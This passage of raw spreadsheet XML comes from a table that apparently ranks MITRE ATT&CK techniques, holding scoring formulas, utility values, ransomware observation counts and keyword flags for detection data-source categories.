        <f t="array" ref="AE247">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD247)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF247" s="37">
        <v>243</v>
      </c>
      <c r="AG247" s="37" t="str" cm="1">
        <f t="array" ref="AG247">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD247)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH247" s="37">
        <v>243</v>
      </c>
      <c r="AI247" s="37" t="str" cm="1">
        <f t="array" ref="AI247">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD247)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ247" s="37">
        <v>243</v>
      </c>
      <c r="AK247" s="37" t="str" cm="1">
        <f t="array" ref="AK247">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD247)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL247" s="37">
        <v>243</v>
      </c>
      <c r="AM247" s="37" t="str" cm="1">
        <f t="array" ref="AM247">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD247)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AN247" s="37">
        <v>0</v>
      </c>
      <c r="AO247" s="37">
        <v>0</v>
      </c>
      <c r="AP247" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ247" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>85.253951111111121</v>
      </c>
      <c r="AR247" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS247" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT247" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU24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48" spans="1:47" ht="34">
      <c r="A248" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B248" s="37">
        <f t="shared" si="3"/>
        <v>205.7980714285714</v>
      </c>
      <c r="C248" s="37" t="s">
        <v>876</v>
      </c>
      <c r="D248" s="50" t="s">
        <v>877</v>
      </c>
      <c r="E248" s="37"/>
      <c r="F248" s="37">
        <v>1</v>
      </c>
      <c r="G248" s="37">
        <v>1</v>
      </c>
      <c r="H248" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I248" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J248" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K248" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L248" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M248" s="37">
        <v>1.119E-3</v>
      </c>
      <c r="N248" s="56">
        <v>0</v>
      </c>
      <c r="O248" s="56">
        <v>4</v>
      </c>
      <c r="P248" s="56">
        <v>0</v>
      </c>
      <c r="Q248" s="56">
        <v>7</v>
      </c>
      <c r="R248" s="57"/>
      <c r="S248" s="57">
        <v>1</v>
      </c>
      <c r="T248" s="57" t="s">
        <v>878</v>
      </c>
      <c r="U248" s="57">
        <v>5</v>
      </c>
      <c r="V248" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.10952385714285715</v>
      </c>
      <c r="W248" s="37">
        <v>6</v>
      </c>
      <c r="X248" s="37">
        <v>0.10909099999999999</v>
      </c>
      <c r="Y248" s="37">
        <v>0.10909099999999999</v>
      </c>
      <c r="Z248" s="37">
        <v>11</v>
      </c>
      <c r="AA248" s="37">
        <v>0.11</v>
      </c>
      <c r="AB248" s="37">
        <v>0.11</v>
      </c>
      <c r="AC248" s="37"/>
      <c r="AD248" s="50" t="s">
        <v>879</v>
      </c>
      <c r="AE248" s="37" t="str" cm="1">
        <f t="array" ref="AE248">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD248)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF248" s="37">
        <v>244</v>
      </c>
      <c r="AG248" s="37" t="str" cm="1">
        <f t="array" ref="AG248">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD248)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH248" s="37">
        <v>244</v>
      </c>
      <c r="AI248" s="37" t="str" cm="1">
        <f t="array" ref="AI248">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD248)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ248" s="37">
        <v>244</v>
      </c>
      <c r="AK248" s="37" t="str" cm="1">
        <f t="array" ref="AK248">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD248)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL248" s="37">
        <v>244</v>
      </c>
      <c r="AM248" s="37" t="str" cm="1">
        <f t="array" ref="AM248">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD248)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN248" s="37">
        <v>0</v>
      </c>
      <c r="AO248" s="37">
        <v>0</v>
      </c>
      <c r="AP248" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ248" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>68.59935714285713</v>
      </c>
      <c r="AR248" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS248" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT248" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU24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49" spans="1:47" ht="34">
      <c r="A249" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="B249" s="37">
        <f t="shared" si="3"/>
        <v>265.39184528571428</v>
      </c>
      <c r="C249" s="37" t="s">
        <v>880</v>
      </c>
      <c r="D249" s="50" t="s">
        <v>881</v>
      </c>
      <c r="E249" s="37"/>
      <c r="F249" s="37">
        <v>1</v>
      </c>
      <c r="G249" s="37">
        <v>1</v>
      </c>
      <c r="H249" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I249" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J249" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K249" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L249" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M249" s="37">
        <v>1.8151E-2</v>
      </c>
      <c r="N249" s="56">
        <v>0</v>
      </c>
      <c r="O249" s="56">
        <v>28</v>
      </c>
      <c r="P249" s="56">
        <v>0</v>
      </c>
      <c r="Q249" s="56">
        <v>4</v>
      </c>
      <c r="R249" s="57"/>
      <c r="S249" s="57">
        <v>0</v>
      </c>
      <c r="T249" s="57"/>
      <c r="U249" s="57">
        <v>0</v>
      </c>
      <c r="V249" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.15238095238095237</v>
      </c>
      <c r="W249" s="37">
        <v>0</v>
      </c>
      <c r="X249" s="37">
        <v>0</v>
      </c>
      <c r="Y249" s="37">
        <v>0</v>
      </c>
      <c r="Z249" s="37">
        <v>32</v>
      </c>
      <c r="AA249" s="37">
        <v>0.32</v>
      </c>
      <c r="AB249" s="37">
        <v>0.32</v>
      </c>
      <c r="AC249" s="37"/>
      <c r="AD249" s="50" t="s">
        <v>159</v>
      </c>
      <c r="AE249" s="37" t="str" cm="1">
        <f t="array" ref="AE249">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD249)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF249" s="37">
        <v>245</v>
      </c>
      <c r="AG249" s="37" t="str" cm="1">
        <f t="array" ref="AG249">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD249)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH249" s="37">
        <v>245</v>
      </c>
      <c r="AI249" s="37" t="str" cm="1">
        <f t="array" ref="AI249">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD249)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ249" s="37">
        <v>245</v>
      </c>
      <c r="AK249" s="37" t="str" cm="1">
        <f t="array" ref="AK249">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD249)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL249" s="37">
        <v>245</v>
      </c>
      <c r="AM249" s="37" t="str" cm="1">
        <f t="array" ref="AM249">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD249)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN249" s="37">
        <v>0</v>
      </c>
      <c r="AO249" s="37">
        <v>1</v>
      </c>
      <c r="AP249" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AQ249" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>88.463948428571427</v>
      </c>
      <c r="AR249" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS249" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT249" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU24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2.1300940102040813</v>
      </c>
    </row>
    <row r="250" spans="1:47" ht="34">
      <c r="A250" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="B250" s="37">
        <f t="shared" si="3"/>
        <v>579.20101333333332</v>
      </c>
      <c r="C250" s="37" t="s">
        <v>882</v>
      </c>
      <c r="D250" s="50" t="s">
        <v>883</v>
      </c>
      <c r="E250" s="37"/>
      <c r="F250" s="37">
        <v>5</v>
      </c>
      <c r="G250" s="37">
        <v>1</v>
      </c>
      <c r="H250" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="I250" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.5</v>
      </c>
      <c r="J250" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.5</v>
      </c>
      <c r="K250" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L250" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M250" s="37">
        <v>7.0689999999999998E-3</v>
      </c>
      <c r="N250" s="56">
        <v>0</v>
      </c>
      <c r="O250" s="56">
        <v>21</v>
      </c>
      <c r="P250" s="56">
        <v>2</v>
      </c>
      <c r="Q250" s="56">
        <v>4</v>
      </c>
      <c r="R250" s="57"/>
      <c r="S250" s="57">
        <v>1</v>
      </c>
      <c r="T250" s="57" t="s">
        <v>884</v>
      </c>
      <c r="U250" s="57">
        <v>15</v>
      </c>
      <c r="V250" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.28095233333333336</v>
      </c>
      <c r="W250" s="37">
        <v>16</v>
      </c>
      <c r="X250" s="37">
        <v>0.29090899999999997</v>
      </c>
      <c r="Y250" s="37">
        <v>0.29090899999999997</v>
      </c>
      <c r="Z250" s="37">
        <v>27</v>
      </c>
      <c r="AA250" s="37">
        <v>0.27</v>
      </c>
      <c r="AB250" s="37">
        <v>0.27</v>
      </c>
      <c r="AC250" s="37"/>
      <c r="AD250" s="50" t="s">
        <v>541</v>
      </c>
      <c r="AE250" s="37" t="str" cm="1">
        <f t="array" ref="AE250">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD250)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF250" s="37">
        <v>246</v>
      </c>
      <c r="AG250" s="37" t="str" cm="1">
        <f t="array" ref="AG250">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD250)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH250" s="37">
        <v>246</v>
      </c>
      <c r="AI250" s="37" t="str" cm="1">
        <f t="array" ref="AI250">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD250)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ250" s="37">
        <v>246</v>
      </c>
      <c r="AK250" s="37" t="str" cm="1">
        <f t="array" ref="AK250">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD250)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL250" s="37">
        <v>246</v>
      </c>
      <c r="AM250" s="37" t="str" cm="1">
        <f t="array" ref="AM250">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD250)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN250" s="37">
        <v>0</v>
      </c>
      <c r="AO250" s="37">
        <v>1</v>
      </c>
      <c r="AP250" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AQ250" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>193.06700444444445</v>
      </c>
      <c r="AR250" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS250" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT250" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU25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4.620642962962962</v>
      </c>
    </row>
    <row r="251" spans="1:47" ht="119">
      <c r="A251" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.53333333333333333</v>
      </c>
      <c r="B251" s="37">
        <f t="shared" si="3"/>
        <v>1297.3819267142858</v>
      </c>
      <c r="C251" s="37" t="s">
        <v>885</v>
      </c>
      <c r="D251" s="50" t="s">
        <v>886</v>
      </c>
      <c r="E251" s="37"/>
      <c r="F251" s="37">
        <v>4</v>
      </c>
      <c r="G251" s="37">
        <v>4</v>
      </c>
      <c r="H251" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.4</v>
      </c>
      <c r="I251" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.4</v>
      </c>
      <c r="J251" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.4</v>
      </c>
      <c r="K251" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.4</v>
      </c>
      <c r="L251" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.4</v>
      </c>
      <c r="M251" s="37">
        <v>0.54990700000000003</v>
      </c>
      <c r="N251" s="56">
        <v>0</v>
      </c>
      <c r="O251" s="56">
        <v>8</v>
      </c>
      <c r="P251" s="56">
        <v>7</v>
      </c>
      <c r="Q251" s="56">
        <v>15</v>
      </c>
      <c r="R251" s="57" t="s">
        <v>887</v>
      </c>
      <c r="S251" s="57">
        <v>10</v>
      </c>
      <c r="T251" s="57" t="s">
        <v>888</v>
      </c>
      <c r="U251" s="57">
        <v>13</v>
      </c>
      <c r="V251" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.36190485714285714</v>
      </c>
      <c r="W251" s="37">
        <v>23</v>
      </c>
      <c r="X251" s="37">
        <v>0.418182</v>
      </c>
      <c r="Y251" s="37">
        <v>0.418182</v>
      </c>
      <c r="Z251" s="37">
        <v>30</v>
      </c>
      <c r="AA251" s="37">
        <v>0.3</v>
      </c>
      <c r="AB251" s="37">
        <v>0.3</v>
      </c>
      <c r="AC251" s="37"/>
      <c r="AD251" s="50" t="s">
        <v>889</v>
      </c>
      <c r="AE251" s="37" t="str" cm="1">
        <f t="array" ref="AE251">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD251)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF251" s="37">
        <v>247</v>
      </c>
      <c r="AG251" s="37" t="str" cm="1">
        <f t="array" ref="AG251">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD251)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH251" s="37">
        <v>247</v>
      </c>
      <c r="AI251" s="37" t="str" cm="1">
        <f t="array" ref="AI251">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD251)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ251" s="37">
        <v>247</v>
      </c>
      <c r="AK251" s="37" t="str" cm="1">
        <f t="array" ref="AK251">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD251)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AL251" s="37">
        <v>247</v>
      </c>
      <c r="AM251" s="37" t="str" cm="1">
        <f t="array" ref="AM251">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD251)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN251" s="37">
        <v>0</v>
      </c>
      <c r="AO251" s="37">
        <v>7</v>
      </c>
      <c r="AP251" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.53333333333333333</v>
      </c>
      <c r="AQ251" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>432.46064223809526</v>
      </c>
      <c r="AR251" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS251" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AT251" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AU25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72.243440373015886</v>
      </c>
    </row>
    <row r="252" spans="1:47" ht="51">
      <c r="A252" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.4</v>
      </c>
      <c r="B252" s="37">
        <f t="shared" si="3"/>
        <v>312.08561971428577</v>
      </c>
      <c r="C252" s="37" t="s">
        <v>890</v>
      </c>
      <c r="D252" s="50" t="s">
        <v>886</v>
      </c>
      <c r="E252" s="37" t="s">
        <v>891</v>
      </c>
      <c r="F252" s="37">
        <v>1</v>
      </c>
      <c r="G252" s="37">
        <v>1</v>
      </c>
      <c r="H252" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I252" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J252" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K252" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L252" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M252" s="37">
        <v>0</v>
      </c>
      <c r="N252" s="56">
        <v>0</v>
      </c>
      <c r="O252" s="56">
        <v>2</v>
      </c>
      <c r="P252" s="56">
        <v>0</v>
      </c>
      <c r="Q252" s="56">
        <v>1</v>
      </c>
      <c r="R252" s="57" t="s">
        <v>887</v>
      </c>
      <c r="S252" s="57">
        <v>10</v>
      </c>
      <c r="T252" s="57" t="s">
        <v>892</v>
      </c>
      <c r="U252" s="57">
        <v>11</v>
      </c>
      <c r="V252" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.21428561904761906</v>
      </c>
      <c r="W252" s="37">
        <v>21</v>
      </c>
      <c r="X252" s="37">
        <v>0.38181799999999999</v>
      </c>
      <c r="Y252" s="37">
        <v>0.38181799999999999</v>
      </c>
      <c r="Z252" s="37">
        <v>3</v>
      </c>
      <c r="AA252" s="37">
        <v>0.03</v>
      </c>
      <c r="AB252" s="37">
        <v>0.03</v>
      </c>
      <c r="AC252" s="37"/>
      <c r="AD252" s="50" t="s">
        <v>893</v>
      </c>
      <c r="AE252" s="37" t="str" cm="1">
        <f t="array" ref="AE252">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD252)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF252" s="37">
        <v>248</v>
      </c>
      <c r="AG252" s="37" t="str" cm="1">
        <f t="array" ref="AG252">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD252)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH252" s="37">
        <v>248</v>
      </c>
      <c r="AI252" s="37" t="str" cm="1">
        <f t="array" ref="AI252">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD252)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ252" s="37">
        <v>248</v>
      </c>
      <c r="AK252" s="37" t="str" cm="1">
        <f t="array" ref="AK252">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD252)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL252" s="37">
        <v>248</v>
      </c>
      <c r="AM252" s="37" t="str" cm="1">
